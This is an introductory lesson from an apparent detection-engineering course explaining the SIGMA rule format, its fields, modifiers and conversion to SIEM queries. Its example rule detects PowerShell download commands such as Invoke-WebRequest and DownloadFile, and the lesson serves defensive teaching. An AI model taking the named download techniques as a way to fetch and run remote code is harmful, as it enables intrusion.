Detection EngineeringModule 1: FoundationsLesson 1.3
20 min

Introduction to SIGMA

Learn the SIGMA rule format - the universal language for detection rules that works across any SIEM.

Introduction to SIGMA

SIGMA is an open standard for writing detection rules in a vendor-agnostic format. Think of it as "YARA for logs" - one rule format that can be converted to any SIEM.

Why SIGMA?

Before SIGMA, detection rules were written in proprietary formats:

  • Splunk SPL
  • Elastic Query DSL
  • Microsoft KQL
  • Sumo Logic queries

    This created problems:

  • Rules couldn't be shared across tools
  • Changing SIEMs meant rewriting everything
  • Community rules were fragmented

    SIGMA solves this with a universal format.

    SIGMA Rule Structure

    Every SIGMA rule has the same basic structure:

    title: Suspicious PowerShell Download
status: experimental
description: Detects PowerShell downloading files from the internet
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'wget'
            - 'curl'
            - 'DownloadFile'
        Image|endswith: '\powershell.exe'
    condition: selection
level: medium
tags:
    - attack.execution
    - attack.t1059.001

    Key Components

    Title & Status
  • title: Clear, descriptive name
  • status: experimental, test, stable, or deprecated

    Description Explain what the rule detects and why it matters.

    Logsource Defines what logs this rule applies to:
  • category: process_creation, network_connection, file_event, etc.
  • product: windows, linux, macos, aws, etc.
  • service: sysmon, security, powershell, etc.

    Detection The actual detection logic:
  • selection: Define patterns to match
  • filter: Define patterns to exclude
  • condition: Combine selections and filters with AND/OR/NOT

    Modifiers SIGMA supports modifiers to match patterns:
  • |contains: Field contains the value
  • |endswith: Field ends with the value
  • |startswith: Field starts with the value
  • |re: Regular expression match

    Level Severity of the detection:
  • low: Informational, might be interesting
  • medium: Worth investigating
  • high: Likely malicious
  • critical: Almost certainly an attack

    Tags Reference to MITRE ATT&CK and other frameworks.

    Converting SIGMA Rules

    The power of SIGMA is conversion. The sigma-cli tool converts rules to:

  • Splunk SPL
  • Elastic Query DSL
  • Microsoft Sentinel KQL
  • Chronicle YARA-L
  • And many more...

    sigma convert -t splunk -p sysmon rule.yml

    Writing Good SIGMA Rules

  • Be specific: Avoid overly broad patterns
  • Document well: Future you will thank you
  • Consider performance: Avoid expensive operations
  • Test thoroughly: Validate before deployment
  • Use standard fields: Stick to normalized field names

    • Key Takeaways

    • SIGMA is a vendor-agnostic detection rule format
    • Rules include logsource, detection logic, and metadata
    • Modifiers like |contains and |endswith enable pattern matching
    • SIGMA rules can be converted to any SIEM format